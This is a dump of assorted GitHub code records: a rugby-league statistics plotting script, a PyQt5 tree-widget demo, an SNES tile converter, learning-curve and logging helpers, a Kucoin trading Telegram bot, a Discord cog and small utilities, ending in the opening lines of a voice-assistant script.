Minutes')\nplt.show()\nfig.savefig('images\\\\penalty_goal_hist.png')\n\nplt.clf()\n\ntr=all_times('Try')\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 5)\nax=fig.add_subplot(1,1,1)\nplt.hist(tr,bins=np.arange(0.01,82.01,2),color='green')\nplt.xlabel('Game Time (mins)')\nplt.title('Distributions of Tries Over 80 Minutes')\nplt.show()\nfig.savefig('images\\\\penalty_goal_hist.png')\n\nplt.clf()\n\n\ndef get_max(x):\n try:\n if max(x)<=80:\n return max(x)\n else:\n x=pd.Series(x)\n return np.max(x[x<=80])\n except:\n return None\n#When are the last points scored\ne=match_timelines['Try'].map(lambda x: get_max(x))\nf=match_timelines['Penalty Shot-Made'].map(lambda x: get_max(x))\ng=match_timelines['Drop Goal-Made'].map(lambda x: get_max(x))\nlast = pd.concat([e,f,g],axis=1)\n\nlasts = last.dropna(how='all')\nlast = lasts.max(axis=1)\nlast_score = lasts.idxmax(axis=1) \nx=[last[last_score=='Try'],last[last_score=='Penalty Shot-Made'],last[last_score=='Drop Goal-Made']]\nplt.hist(x,bins=80,stacked=True)\nplt.legend(['Try','Penalty','Field Goal'])\n\n\n\n\ntry_rate = 80/(tr.shape[0]/games.shape[0])\nexp_times = np.exp(-np.linspace(0,81,80)/try_rate)\nplt.plot(np.linspace(0,81,80),exp_times*games.shape[0])\nplt.hist(80-e[e>0])\n\ndef get_min(x):\n try:\n if min(x)<=80:\n return min(x)\n else:\n return 81\n except:\n return 81\n\nteam_timelines = match_timelines.loc[match_timelines['Team']!='']\n\ne1=team_timelines['Try'].map(lambda x: get_min(x))\nplt.hist(e1,bins=80,cumulative=True,density=True)\nplt.plot(np.linspace(0,81,80),(1-exp_times))\nplt.xlabel(\"Time until first try\")\n\n\npen_rate = 80/(pg.shape[0]/match_timelines[match_timelines['Team']!=''].shape[0])\ncum_pen_exp =1- np.exp(-np.linspace(0,81,80)/pen_rate)\n\nf1=team_timelines['Penalty Shot-Made'].map(lambda x: get_min(x))\nplt.hist(f1,bins=80,cumulative=True,density=True)\nplt.plot(np.linspace(0,81,80),cum_pen_exp)\nplt.ylim(0,0.6)\nplt.xlabel(\"Time until first pealty goal\")\n\nfield_rate = 80/(fg.shape[0]/games.shape[0])\ncum_field_exp =1- np.exp(-np.linspace(0,81,80)/field_rate)\n\ng1=team_timelines['Drop Goal-Made'].map(lambda x: get_min(x))\nplt.hist(g1,bins=80,cumulative=True,density=True)\nplt.plot(np.linspace(0,81,80),cum_field_exp)\nplt.ylim(0,0.2)\nplt.xlabel(\"Time until first field goal\")\n\ng=match_timelines['Drop Goal-Made'].map(lambda x: get_max(x))\n\n\n#Plotting probabiliy heat map for successfully kicking a field goal\na=np.arange(1,50)\nb=np.arange(-33.5,34.5)\n(A,B)=np.meshgrid(a,b)\n\n\n\n\ndist=np.sqrt(A**2+B**2)\n\nang_left = np.arctan((B+2.75)/A)\nang_right = np.arctan((B-2.75)/A) \n\nangle =np.abs(ang_left-ang_right)\nsig= 1/(1+np.exp((dist-25)/10))\n\nfield_prob = np.zeros((68,60))\n\nfield_prob[:,11:]= sig\n\nplt.imshow(field_prob,cmap='RdYlGn_r')\n\nplt.imshow(angle*5,cmap='RdYlGn_r')\n\n\nd = np.arange(6)\n(C,D)=np.meshgrid(a,d)\n\ntry_prob = 0.8*np.exp(-C/20)*np.power(0.95,D)\n\nplt.imshow(try_prob,cmap='RdYlGn_r')\n\ndef draw_pitch(ax,fill=True,numbers=True):\n # focus on only half of the pitch\n #Pitch Outline & Centre Line\n if fill:\n Pitch = pat.Rectangle([0,0], width = 60, height = 68, facecolor='green', edgecolor='white')\n else:\n Pitch = pat.Rectangle([0,0], width = 60, height = 68, fill=False)\n #Left, Right Penalty Area and midline\n goalline =pat.ConnectionPatch([10,0], [10,68], \"data\", \"data\",color='white',lw=4)\n tenline =pat.ConnectionPatch([20,0], [20,68], \"data\", \"data\",color='white')\n twentyline =pat.ConnectionPatch([30,0], [30,68], \"data\", \"data\",color='white')\n thirtyline =pat.ConnectionPatch([40,0], [40,68], \"data\", \"data\",color='white')\n fortyline =pat.ConnectionPatch([50,0], [50,68], \"data\", \"data\",color='red')\n midline = pat.ConnectionPatch([60,0], [60,68], \"data\", \"data\",color='white')\n \n #goalposts\n leftpost=pat.ConnectionPatch([10,30], [2,40],\"data\",\"data\",color='white')\n rightpost=pat.ConnectionPatch([10,38], [2,48],\"data\",\"data\",color='white')\n crossbar = pat.ConnectionPatch([7,33.65], [7,41.65],\"data\",\"data\",color='white')\n thedot = pat.ConnectionPatch([7,37.5], [7,37.8],\"data\",\"data\",color='black')\n\n\n element = [Pitch, goalline,tenline,twentyline,thirtyline,fortyline,midline,leftpost,rightpost,crossbar,thedot]\n for i in element:\n ax.add_patch(i)\n if numbers==True: \n plt.text(18,10,'1',color='white',fontsize=17)\n plt.text(20,10,'0',color='white',fontsize=17)\n plt.text(27,10,'2',color='white',fontsize=17)\n plt.text(30,10,'0',color='white',fontsize=17)\n plt.text(37,10,'3',color='white',fontsize=17)\n plt.text(40,10,'0',color='white',fontsize=17)\n plt.text(47,10,'4',color='white',fontsize=17)\n plt.text(50,10,'0',color='white',fontsize=17)\n\n \nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 6.8)\nax=fig.add_subplot(1,1,1)\ndraw_pitch(ax) #overlay our different objects on the pitch\nplt.ylim(-2, 70)\nplt.xlim(-2, 62)\nplt.axis('off')\nplt.show()\n\nfig.savefig('images\\\\pitch.png')\n\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(7, 5)\nax=fig.add_subplot(1,1,1)\ndraw_pitch(ax,fill=False) #overlay our different objects on the pitch\nheat =plt.imshow(field_prob,cmap='RdYlGn_r')\nfig.colorbar(heat)\nplt.ylim(0, 68)\nplt.xlim(0, 60)\nplt.axis('off')\nplt.title('Probability of Successfully Kicking a Field Goal')\nplt.show()\n\nfig.savefig('images\\\\field_probs.png')\n\n\n#\n\nd = np.arange(6)\n(C,D)=np.meshgrid(a,d)\n\ntry_prob = 0.5*np.exp(-C/20)*np.power(0.9,D)\n\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(7, 5)\nax=fig.add_subplot(1,1,1)\nheat=plt.imshow(try_prob,cmap='RdYlGn_r',aspect='auto')\nfig.colorbar(heat)\n\nplt.xlabel('Distance from Tryline (m)')\nplt.ylabel('Tackle Count')\nplt.title('Probability of Scoring a Try')\nplt.show()\n\nfig.savefig('images\\\\try_probs.png')\n\nplt.clf()\n\n\n\nraiders_win = pd.read_csv('pipeline\\\\raiders_win',header=None)\n\ndef decider(win_probs, t, tackle):\n win_prob_if_attempt = field_prob[:,11:]*win_probs.iloc[t-60,0] + (1-field_prob[:,11:])*win_probs.iloc[t-60,2]\n win_prob_if_no_attempt = try_prob[tackle,:]*win_probs.iloc[t-60,1] + (1-try_prob[tackle,:])*win_probs.iloc[t-60,2] \n \n ar = np.zeros((68,60))\n ar[:,11:] = win_prob_if_attempt-win_prob_if_no_attempt\n fig=plt.figure() #set up the figures\n# fig.set_size_inches(7, 5)\n# ax=fig.add_subplot(1,1,1)\n# draw_pitch(ax,fill=False) #overlay our different objects on the pitch\n# cmap = plt.cm.RdYlGn_r\n# cmap.set_under(color='green')\n# heat =plt.imshow(ar,aspect='auto',cmap=cmap,vmin=0.001,vmax=0.25)\n# plt.ylim(0, 68)\n# plt.xlim(0, 60)\n# plt.axis('off')\n return ar, fig\ncmap = plt.cm.RdYlGn_r\ncmap.set_under(color='green')\nfig,axes=plt.subplots(4,3) #set up the figures\n#fig.set_size_inches(7, 5)\nfor i in np.arange(4):\n for j in np.arange(3):\n ax=axes[i,j]\n draw_pitch(ax,fill=False,numbers=False)\n ax.imshow(decider(raiders_win,62+5*i,1+2*j)[0],aspect='auto',cmap=cmap,vmin=0.001,vmax=0.25,origin='lower')\n ax.axis('off')\n\n\ncols = 1+2*np.arange(3)\nrows = 62+5*np.arange(4)\n\n\nfor ax, col in zip(axes[-1], cols):\n ax.annotate(col, xy=(0.5, 0), xytext=(0, -10),\n xycoords='axes fraction', textcoords='offset points',\n size='large', ha='center', va='baseline')\n\nfor ax, row in zip(axes[:,0], rows):\n ax.annotate(row, xy=(0, 0.5), xytext=(-ax.yaxis.labelpad, 0),\n xycoords='axes fraction', textcoords='offset points',\n size='large', ha='right', va='center')\n\nfig.text(0.5, 0, 'Tackle Count',size='large', ha='center')\nfig.text(0, 0.5, 'Time', va='center',size='large', rotation='vertical')\nfig.tight_layout()\nplt.show()\nfig.savefig('images\\\\cases.png')\n\nimport scipy as scipy\nav_tries=np.mean(games['Tries+'])\n\ndef exp_tries(game, av_tries,home=True):\n exp_tries = game.loc[game['Home']==home,'tries_scored_per_game'].iloc[0]*game.loc[game['Home']!=home,'tries_conceded_per_game'].iloc[0]/av_tries\n return exp_tries\n\nexp_home_tries = games.groupby(['Year','Match'],as_index=False).apply(lambda x:exp_tries(x,av_tries,home=True))\nexp_away_tries = games.groupby(['Year','Match'],as_index=False).apply(lambda x:exp_tries(x,av_tries,home=False))\n\nexp_tries = exp_home_tries.reset_index().merge(exp_away_tries.reset_index(),on=['Year','Match'])\n\nhome_games=games.loc[games['Home']]\nexp_obs_tries = exp_tries.merge(home_games[['Year','Match','Tries+','Tries-']],on=['Year','Match'])\nmat=exp_obs_tries[exp_obs_tries['Year']>2013]\n\nmat.to_csv('pipeline\\\\exp_obs')\nchi_stat = (exp_obs_tries.iloc[:,4]-exp_obs_tries.iloc[:,2])**2/exp_obs_tries.iloc[:,2]\n\nobs_home = mat.iloc[:,4]\nexp_home = mat.iloc[:,2]\n\nhome_dev = 2*(obs_home*np.log(obs_home/exp_home)-obs_home+exp_home)\nhome_dev[obs_home==0]=2*exp_home\n\nobs_away = mat.iloc[:,5]\nexp_away = mat.iloc[:,3]\n\naway_dev = 2*(obs_away*np.log(obs_away/exp_away)-obs_away+exp_away)\naway_dev[obs_away==0]=2*exp_away\n\n\n\npennies= games[['PenaltyGoals+','penalty_goals_per_game']].iloc[384:]\npennies.to_csv('pipeline\\\\exp_obs_pen')\n\nimport scipy.stats as stats\n\n1-scipy.stats.chi2.cdf(np.sum(home_dev), 1151)\n\n1-scipy.stats.chi2.cdf(np.sum(away_dev), 1151)\n\n1-scipy.stats.chi2.cdf(np.sum(away_dev)+np.sum(home_dev), 2304)\n\n1-scipy.stats.chi2.cdf(2348.2, 2302)\n\n\npens = match_timelines.loc[match_timelines['Team']!='','Penalty Shot-Made']\n\ntimes=[]\nevents=[]\nfor i in np.arange(pens.shape[0]):\n if np.isnan(pens[i]).any():\n times.append(80.0)\n events.append(0)\n else:\n x=pens[i]\n x.sort()\n for j in np.arange(len(x)):\n if j==0:\n times.append(x[j])\n events.append(1)\n else:\n times.append(x[j]-x[j-1])\n events.append(1)\n \n times.append(80-x[-1])\n events.append(0)\n \np = pd.DataFrame({'time':times,'Goal':events})\np1=p.loc[(p['time']>0)&(p['time']<=80)] \n\np1.to_csv('pipeline\\\\penalty')\np1.sort_values(by='time',inplace=True)\np1['Risk']= p1.shape[0]-np.arange(p1.shape[0],)\np1['Cond_no_goal']=(p1['Risk']-p1['Goal'])/p1['Risk']\np1['SurvProb']=np.cumprod(p1['Cond_no_goal'])\n\nplt.plot(p1['time'],1-p1['SurvProb'])\nplt.plot(p1['time'],1-np.exp(-p1['time']/pen_rate))\nplt.legend(['Observed','Expected'])\n\ntrs = match_timelines.loc[match_timelines['Team']!='','Try']\n\ntimes=[]\nevents=[]\nfor i in np.arange(trs.shape[0]):\n if np.isnan(trs[i]).any():\n times.append(80.0)\n events.append(0)\n else:\n x=trs[i]\n x.sort()\n for j in np.arange(len(x)):\n if j==0:\n times.append(x[j])\n events.append(1)\n else:\n times.append(x[j]-x[j-1])\n events.append(1)\n \n times.append(80-x[-1])\n events.append(0)\n\n\nt = pd.DataFrame({'time':times,'Goal':events})\nt1=t.loc[(t['time']>0)&(t['time']<=80)] \n\nt1.to_csv('pipeline\\\\try')\nt1.sort_values(by='time',inplace=True)\nt1['Risk']= t1.shape[0]-np.arange(t1.shape[0],)\nt1['Cond_no_goal']=(t1['Risk']-t1['Goal'])/t1['Risk']\nt1['SurvProb']=np.cumprod(t1['Cond_no_goal'])\n\ntry_rate = 80/(tr.shape[0]/match_timelines[match_timelines['Team']!=''].shape[0])\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6,5)\nax=fig.add_subplot(1,1,1)\nplt.plot(t1['time'],t1['SurvProb'])\nplt.plot(t1['time'],np.exp(-t1['time']/try_rate))\nplt.legend(['Observed','Expected'])\nplt.title('Survival until next try: observed vs expected')\nfig.savefig('images\\\\try_srv.png')\n\nha =np.array(home_games[['Tries+','Tries-']])\nhh=[]\nfor i in np.arange(np.max(ha,axis=0)[0]+1):\n hh.append(np.unique(ha[ha[:,0]==i,1],return_counts=True))\n\nhj = np.zeros((np.max(ha,axis=0)+1))\nfor i in np.arange(np.max(ha,axis=0)[0]+1):\n for j in np.arange(len(hh[i][0])):\n hj[i,hh[i][0][j]] = hh[i][1][j]\n\nfact_h = np.ones(hj.shape[0]) \nfact_h[1:]=np.cumprod(np.arange(1,hj.shape[0]))\nfact_a = np.ones(hj.shape[1]) \nfact_a[1:]=np.cumprod(np.arange(1,hj.shape[1]))\n\nmean_home= np.mean(ha[:,0])\nmean_away = np.mean(ha[:,1])\nex_h = mean_home**(np.arange(hj.shape[0]))*np.exp(-mean_home)/fact_h\nex_a = mean_away**(np.arange(hj.shape[1]))*np.exp(-mean_away)/fact_a\n\nexp_ha =np.outer(ex_h,ex_a)*ha.shape[0]\ncf = np.corrcoef(ha.T)\n\n\n#Using Skellam distribution to find probabilty of victory if field goal is kicked\nseconds = np.linspace(0,80,4801)\nnew_mean = (80-seconds)/try_rate\n\nfrom scipy.stats import skellam\n\n\ndef prob_win(n):\n z=np.zeros((n+1,4801))\n for i in np.arange(n+1):\n z[i,:]=skellam.cdf(i,new_mean,new_mean)\n return z\n\nz= prob_win(3)\n\n\ndef prob_win_change(n):\n z=np.zeros((n+1,4801))\n for i in np.arange(n+1):\n z[i,:]=skellam.pmf(i,new_mean,new_mean)*0.5\n return z\n\nchange= prob_win_change(3)\nzoomz = z.T[3600:,:]\nzoomchange = change.T[3600:,:]\nyoomy = zoomz-zoomchange\n\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(10,10)\nax1=fig.add_subplot(2,2,1)\nout_mat = [[0,1,1,1],[-1,0,1,1],[-1,-1,0,1],[-1,-1,-1,0]]\nplt.imshow(out_mat, interpolation='nearest',cmap='RdBu')\nplt.title('Outcomes')\nplt.ylabel('Opposition Tries')\nplt.xlabel('Tries')\nplt.xticks([0,1,2,3])\nplt.yticks([0,1,2,3])\ns = [['DW','WW','WW','WW'], ['LL', 'DW','WW','WW'],['LL','LL','DW','WW'],['LL','LL','LL','DW']]\nfor i in range(4):\n for j in range(4):\n plt.text(j,i, str(s[i][j]))\n\nax2=fig.add_subplot(2,2,2)\nplt.plot(seconds[3600:],yoomy)\nplt.title('Probability of victory before field goal')\nplt.xlabel('Match time')\nplt.legend(['0','6','12','18'],title=\"Lead by:\",loc='lower left')\nplt.ylim(0.48,1.02)\nax23=fig.add_subplot(2,2,3)\nplt.plot(seconds[3600:],zoomz)\nplt.title('Probability of victory after field goal')\nplt.xlabel('Match time')\nplt.ylim(0.48,1.02)\nax4=fig.add_subplot(2,2,4)\nplt.plot(seconds[3600:],zoomchange)\nplt.title('Increase in probability of victory after field goal')\nplt.xlabel('Match time')\nfig.savefig('images\\\\vic_prob.png')\n\n\n\nplt.clf()\n\n\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 6.8)\nax=fig.add_subplot(1,1,1)\n\n\nfig=plt.figure() #set up the figures\nax=fig.add_subplot(1,1,1)\nplt.plot(np.arange(60,80),raiders_win)\nplt.legend(['Win field goal','Win try','Win no score'])\nplt.title('Probability of Raiders Victory')\nplt.xlabel('Time')\n\nfig.savefig('images\\\\vic_probs.png')\n","repo_name":"matthewrunck/NRL_stats","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":18444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29438524652","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QColor, QBrush, QIcon\nimport sys\n\nclass BasicTreeWidget(QMainWindow):\n def __init__(self):\n super(BasicTreeWidget, self).__init__()\n self.setWindowTitle('树控件(QTreeWidget)的基本用法')\n\n self.tree = QTreeWidget()\n # 为树控件指定列数\n self.tree.setColumnCount(2)\n\n # 指定列标签\n self.tree.setHeaderLabels(['Key', 'Value'])\n\n # 设定根节点\n root = QTreeWidgetItem(self.tree)\n root.setText(0, '根节点')\n root.setIcon(0, QIcon('new.png'))\n self.tree.setColumnWidth(0, 160)\n\n # 设定子节点1\n child1 = QTreeWidgetItem(root) # 属于根节点的 子节点\n child1.setText(0, '子节点1')\n child1.setText(1, '子节点1的数据')\n child1.setIcon(0, QIcon('new.png'))\n child1.setCheckState(0, Qt.Checked) # 添加复选框\n\n # 设定子节点2\n child2 = QTreeWidgetItem(root) # 属于根节点的 子节点\n child2.setText(0, '子节点2')\n child2.setIcon(0, QIcon('new.png'))\n child2.setCheckState(0, Qt.Checked) # 添加复选框\n\n # 设定子节点2的子节点\n child3 = QTreeWidgetItem(child2) # 属于根节点的 子节点\n child3.setText(0, '子节点2-1')\n child3.setText(1, '子节点2-1的数据')\n child3.setIcon(0, QIcon('new.png'))\n child3.setCheckState(0, Qt.Checked) # 添加复选框\n\n self.tree.expandAll()\n\n self.setCentralWidget(self.tree)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n main = BasicTreeWidget()\n main.show()\n\n sys.exit(app.exec_())\n","repo_name":"royccg/python_tech","sub_path":"pyqt5_tech/代码创建窗口/table_tree/BasicTreeWidget.py","file_name":"BasicTreeWidget.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5775533387","text":"import numpy as np\nimport PIL.Image\nimport sys\n\nX_FLIP = 0x4000\nY_FLIP = 0x8000\nPAL = 0x1000\n\nim = PIL.Image.open(sys.argv[1])\ntiles = np.array(np.split(np.array(np.split(np.array(im), 28, 0)), 32, 2))\ntilemapRaw = bytearray(32 * 28 * 2)\ntilemap = np.ndarray(shape=(28, 32), dtype='<u2', buffer=tilemapRaw)\ntiledata = [[0] * 64]\n\nfor tid in np.mgrid[:32, :28].reshape(2, -1).T:\n tile = tiles[tuple(tid)]\n tid = tuple(np.flip(tid))\n data = list(tile.flatten())\n try:\n index = tiledata.index(data)\n tilemap[tid] = index | PAL\n continue\n except:\n pass\n\n data = list(np.flip(tile, 0).flatten())\n try:\n index = tiledata.index(data)\n tilemap[tid] = index | PAL | Y_FLIP\n continue\n except:\n pass\n\n data = list(np.flip(tile, 1).flatten())\n try:\n index = tiledata.index(data)\n tilemap[tid] = index | PAL | X_FLIP\n continue\n except:\n pass\n\n data = list(np.flip(np.flip(tile, 0), 1).flatten())\n try:\n index = tiledata.index(data)\n tilemap[tid] = index | PAL | X_FLIP | Y_FLIP\n continue\n except:\n pass\n\n data = list(tile.flatten())\n index = len(tiledata)\n tilemap[tid] = index | PAL\n tiledata.append(data)\n\nchardataRaw = bytearray(len(tiledata) * 32)\n\npalette = np.array(im.getpalette(), np.uint16).reshape(-1, 3)\npalette >>= 3\npalette = palette[:,0] | (palette[:,1] << 5) | (palette[:,2] << 10)\n\nfor i, tile in enumerate(tiledata):\n for y in range(8):\n tileData = [0] * 4\n for x in range(8):\n t = tile[y * 8 + x]\n tileData[0] |= ((t & 1) >> 0) << (7 - x)\n tileData[1] |= ((t & 2) >> 1) << (7 - x)\n tileData[2] |= ((t & 4) >> 2) << (7 - x)\n tileData[3] |= ((t & 8) >> 3) << (7 - x)\n tileBase = i * 32 + y * 2\n chardataRaw[tileBase + 0x00] = tileData[0]\n chardataRaw[tileBase + 0x01] = tileData[1]\n chardataRaw[tileBase + 0x10] = tileData[2]\n chardataRaw[tileBase + 0x11] = tileData[3]\n\ndef printMem(mem):\n for i in range(len(mem) // 16):\n line = mem[i * 16:(i + 1) * 16]\n print('\\t' + ', '.join([f'0x{b:02X}' for b in line]) + ',')\n\nprint('uint16_t palette[] = {');\nfor rgb in palette[:16]:\n print(f'\\t0x{rgb:04X},')\nprint('};')\nprint()\n\nprint('uint8_t tilemap[] = {');\nprintMem(tilemapRaw)\nprint('};')\nprint()\n\nprint('uint8_t chardata[] = {');\nprintMem(chardataRaw)\nprint('};')\n","repo_name":"mgba-emu/mgba","sub_path":"tools/snes-tile.py","file_name":"snes-tile.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":4880,"dataset":"github-code","pt":"48"} +{"seq_id":"35614266920","text":"from sklearn.model_selection import learning_curve\nimport numpy as np\n\n\ndef compute_learning_curve(estimator, X, y, cv=5):\n train_sizes, train_scores, test_scores = \\\n learning_curve(estimator=estimator,\n scoring='neg_mean_squared_error',\n X=X,\n y=y,\n train_sizes=np.linspace(0.1, 1.0, 11),\n cv=cv,\n n_jobs=1,\n )\n\n train_mean = np.mean(np.sqrt(-train_scores), axis=1)\n train_std = np.std(np.sqrt(-train_scores), axis=1)\n test_mean = np.mean(np.sqrt(-test_scores), axis=1)\n test_std = np.std(np.sqrt(-test_scores), axis=1)\n\n learning_curve_params = {\n 'train_sizes': train_sizes,\n 'train_scores': train_scores,\n 'test_scores': test_scores,\n 'train_mean': train_mean,\n 'train_std': train_std,\n 'test_mean': test_mean,\n 'test_std': test_std\n }\n\n return learning_curve_params\n\n\ndef plot_learning_curve(ax, lc_params):\n ax.plot(lc_params['train_sizes'], lc_params['train_mean'],\n color='blue', marker='o',\n markersize=5, label='training RMSE')\n\n ax.fill_between(lc_params['train_sizes'],\n lc_params['train_mean'] + lc_params['train_std'],\n lc_params['train_mean'] - lc_params['train_std'],\n alpha=0.15, color='blue')\n\n ax.plot(lc_params['train_sizes'], lc_params['test_mean'],\n color='green', linestyle='--',\n marker='s', markersize=5,\n label='validation RMSE')\n\n ax.fill_between(lc_params['train_sizes'],\n lc_params['test_mean'] + lc_params['test_std'],\n lc_params['test_mean'] - lc_params['test_std'],\n alpha=0.15, color='green')\n\n ax.grid()\n ax.set_xlabel('Number of training samples')\n ax.set_ylabel('RMSE')\n ax.legend()\n","repo_name":"W-Tran/advanced-regression-techniques","sub_path":"art/learning_curve.py","file_name":"learning_curve.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43933110834","text":"import logging\nimport logging.handler\nimport os\nimport sys\nimport time\n\n\ndef __setuplogging(logfile, loglevel, runAs, console=False):\n\n log = logging.getLogger()\n\n logfile = os.path.expanduser(logfile)\n if logfile == 'syslog':\n logStream = logging.handlers.SysLogHandler('/dev/log')\n elif logfile == 'stdout':\n logStream = logging.StreamHandler()\n else:\n lf = os.path.expanduser(logfile)\n logdir = os.path.dirname(lf)\n if not os.path.exists(logdir):\n os.makedirs(logdir)\n runuid = pwd.getpwnam(runAs).pw_uid\n rungid = pwd.getpwnam(runAs).pw_gid \n os.chown(logdir, runuid, rungid)\n logStream = logging.FileHandler(filename=lf) \n\n FORMAT='%(asctime)s (UTC) [ %(levelname)s ] %(name)s %(filename)s:%(lineno)d %(funcName)s(): %(message)s'\n formatter = logging.Formatter(FORMAT)\n formatter.converter = time.gmtime # to convert timestamps to UTC\n logStream.setFormatter(formatter)\n log.addHandler(logStream)\n\n # adding a new Handler for the console, \n # to be used only for DEBUG and INFO modes. \n if logLevel in [logging.DEBUG, logging.INFO]:\n if console:\n console = logging.StreamHandler(sys.stdout)\n console.setFormatter(formatter)\n console.setLevel(logLevel)\n log.addHandler(console)\n log.setLevel(logLevel)\n log.info('Logging initialized.')\n","repo_name":"jose-caballero/toolbox","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6587994080","text":"import logging\nimport telegram\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nimport kucoin\n\n# Initialize Kucoin client\nkucoin_client = kucoin.Client(api_key='your_api_key', api_secret='your_api_secret')\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\n# Define Telegram bot\ndef start(update, context):\n update.message.reply_text('Hi! I am a bot that receives signal messages and places trades on Kucoin. Send me a signal message to get started.')\n\ndef process_signal_message(update, context):\n message = update.message.text\n # Parse the signal message\n tokens = message.split()\n symbol = tokens[0].strip('$').split('/')[0]\n if tokens[1].strip().lower() != 'buy':\n update.message.reply_text('Invalid signal message: expected \"Buy\".')\n return\n buy_prices = [float(price.strip()) for price in tokens[2].split('-')]\n if tokens[3].strip().lower() != 'sell':\n update.message.reply_text('Invalid signal message: expected \"Sell\".')\n return\n sell_prices = [float(price.strip()) for price in tokens[4].split('-')]\n if tokens[5].strip().lower() != 'sl':\n update.message.reply_text('Invalid signal message: expected \"SL\".')\n return\n stop_loss = float(tokens[6].strip())\n # Place a market buy order\n response = kucoin_client.create_order(symbol=symbol, side='buy', type='market')\n if response.get('success'):\n update.message.reply_text(f'Market buy order for {symbol} placed successfully.')\n else:\n update.message.reply_text(f'Failed to place market buy order for {symbol}: {response.get(\"msg\")}')\n\ndef error(update, context):\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\n\ndef main():\n updater = Updater(\"your_telegram_bot_token\", use_context=True)\n\n dp = updater.dispatcher\n\n dp.add_handler(CommandHandler(\"start\", start))\n dp.add_handler(MessageHandler(Filters.text, process_signal_message))\n dp.add_error_handler(error)\n\n updater.start_polling()\n\n updater.idle()\n\nif __name__ == '__main__':\n main()\n","repo_name":"arnob016/PyClass","sub_path":"Quiz 3D OOP2/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"14087870187","text":"import discord\nfrom discord.ext import commands\n\n\nclass RHP(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n\n @commands.command(aliases=['RHP', 'rippe', 'Rippe'])\n async def rhp(self, ctx):\n await ctx.send('Rippe Has Problems!')\n\n\ndef setup(client):\n client.add_cog(RHP(client))\n","repo_name":"itZzosku/Telemetry-Discord-Bot","sub_path":"cogs/RHP.py","file_name":"RHP.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14961143630","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'plusMinus' function below.\n#\n# The function accepts INTEGER_ARRAY arr as parameter.\n#\n\ndef plusMinus(arr):\n \n total_count = len(arr)\n pos_count = len([element for element in arr if element > 0])\n neg_count = len([element for element in arr if element < 0])\n zero_count = len([element for element in arr if element == 0])\n \n proportion_arr = [float(pos_count)/float(total_count), float(neg_count)/float(total_count), float(zero_count)/float(total_count)]\n \n for prop_arr in proportion_arr:\n print(\"{:.6f}\".format(prop_arr))\n \n \n \n\nif __name__ == '__main__':\n n = int(raw_input().strip())\n\n arr = map(int, raw_input().rstrip().split())\n\n plusMinus(arr)\n \n ","repo_name":"mogul27/HackerRankSolutions","sub_path":"Algorithms_Python/PlusMinus/PlusMinus.py","file_name":"PlusMinus.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5227830549","text":"import os\nimport shutil\nfrom utils.FileDeal import delete_and_create_dir\nfrom utils.Path import dataset_path\n\n# dataset_path = r\"D:\\ML\" # 数据集路径\n\n\n# 用于创建自己的小量数据集\ndef custom_dataset(path, target_path, number=50):\n dirs_name = os.listdir(path) # 获取path文件加下文件夹名称\n for dir_name in dirs_name:\n dir_path = path + '/' + dir_name # 拼接path下文件夹的路径,如停机坪路径\n files_name = os.listdir(dir_path) # 获取停机坪等文件夹下的文件名\n print(dir_name)\n os.mkdir(target_path + '/' + dir_name) # 在目标文件夹下新建停机坪等文件夹\n for file_name in files_name[:number]: # 取停机坪等文件夹下的前50个文件\n file_path = dir_path + '/' + file_name\n shutil.copy(file_path, target_path + '/' + dir_name) # 目标文件,移动后的文件\n print(\"运行完成\")\n\n\n# 自定义训练集\ndef custom_train_dataset(path=dataset_path, number=50):\n target_path = path + '/t_train'\n delete_and_create_dir(target_path)\n custom_dataset(path=path+'/train', target_path=target_path, number=number)\n\n\n# 自定义测试集\ndef custom_test_dataset(path=dataset_path, number=50):\n target_path = path + '/t_test'\n delete_and_create_dir(target_path)\n custom_dataset(path=path+'/test', target_path=target_path, number=number)\n\n\nif __name__ == \"__main__\":\n custom_train_dataset()\n custom_test_dataset()\n","repo_name":"water75/ML","sub_path":"utils/CustomDataset.py","file_name":"CustomDataset.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32154873125","text":"import pyttsx3\nimport os\nimport smtplib\nimport datetime\nimport wikipedia\nimport webbrowser\nimport speech_recognition as sr\n\nengine = pyttsx3.init('sapi5')\nvoice = engine.getProperty('voices')\nengine.setProperty('voice',voice[0].id)\n\ndef speak(audio):\n engine.say(audio)\n engine.runAndWait()\n\ndef WishMe():\n hour = datetime.datetime.now().hour\n if 